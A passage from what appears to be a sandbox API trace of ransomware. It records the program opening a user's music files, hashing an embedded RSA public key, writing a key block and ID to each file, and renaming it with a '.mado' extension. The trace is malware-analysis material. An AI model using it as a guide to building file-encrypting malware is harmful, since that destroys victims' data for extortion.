returned 0x32c3a48 [0204.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.778] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xVVIlnstf9.wav") returned=".wav" [0204.778] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xVVIlnstf9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xvvilnstf9.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.779] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=30828) returned 1 [0204.779] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.781] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x7846, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.781] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.782] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.782] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x786c, lpOverlapped=0x0) returned 1 [0204.783] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.783] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.783] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.783] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.784] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.784] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.784] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.784] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.784] GetLastError () returned 0x0 [0204.784] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.784] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.784] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.784] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.784] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7870) returned 0x3b74b68 [0204.785] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80d20 [0204.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe460 [0204.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80d68 [0204.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe478 [0204.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4a8 [0204.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4f0 [0204.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4c0 [0204.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b68078 [0204.785] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b81690 [0204.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4a8 | out: hHeap=0x2c0000) returned 1 [0204.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4c0 | out: hHeap=0x2c0000) returned 1 [0204.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4f0 | out: hHeap=0x2c0000) returned 1 [0204.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4f0 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe4c0 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe4a8 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bdb0 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bec8 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4c0 | out: hHeap=0x2c0000) returned 1 [0204.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4a8 | out: hHeap=0x2c0000) returned 1 [0204.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4f0 | out: hHeap=0x2c0000) returned 1 [0204.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.786] GetCurrentThreadId () returned 0x600 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b725f0 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.787] GetCurrentThreadId () returned 0x600 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4f0 [0204.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4a8 [0204.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4c0 [0204.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe490 [0204.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe508 [0204.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4d8 [0204.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe520 [0204.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4a8 | out: hHeap=0x2c0000) returned 1 [0204.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4a8 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4f0 | out: hHeap=0x2c0000) returned 1 [0204.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bdb0 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe520 | out: hHeap=0x2c0000) returned 1 [0204.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b7c3e0 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bb80 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bc98 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4a8 | out: hHeap=0x2c0000) returned 1 [0204.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b81690 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c3e0 | out: hHeap=0x2c0000) returned 1 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4d8 | out: hHeap=0x2c0000) returned 1 [0204.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe508 | out: hHeap=0x2c0000) returned 1 [0204.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4c0 | out: hHeap=0x2c0000) returned 1 [0204.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe490 | out: hHeap=0x2c0000) returned 1 [0204.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe478 | out: hHeap=0x2c0000) returned 1 [0204.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80d68 | out: hHeap=0x2c0000) returned 1 [0204.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.790] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x786c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.790] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.790] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.790] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.790] CloseHandle (hObject=0x63c) returned 1 [0204.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3b74b68 [0204.792] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xVVIlnstf9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xvvilnstf9.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xVVIlnstf9.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xvvilnstf9.wav.mado")) returned 1 [0204.793] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6e0470, ftCreationTime.dwHighDateTime=0x1d5e5a8, ftLastAccessTime.dwLowDateTime=0xaea4bd00, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0xaea4bd00, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x115a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YBOIpo.m4a", cAlternateFileName="")) returned 1 [0204.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.793] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YBOIpo.m4a") returned=".m4a" [0204.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YBOIpo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yboipo.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.793] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=71078) returned 1 [0204.793] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.796] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x11580, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.796] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.797] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x115a6, lpOverlapped=0x0) returned 1 [0204.798] lstrlenA (lpString="-----BEGIN PUBLIC 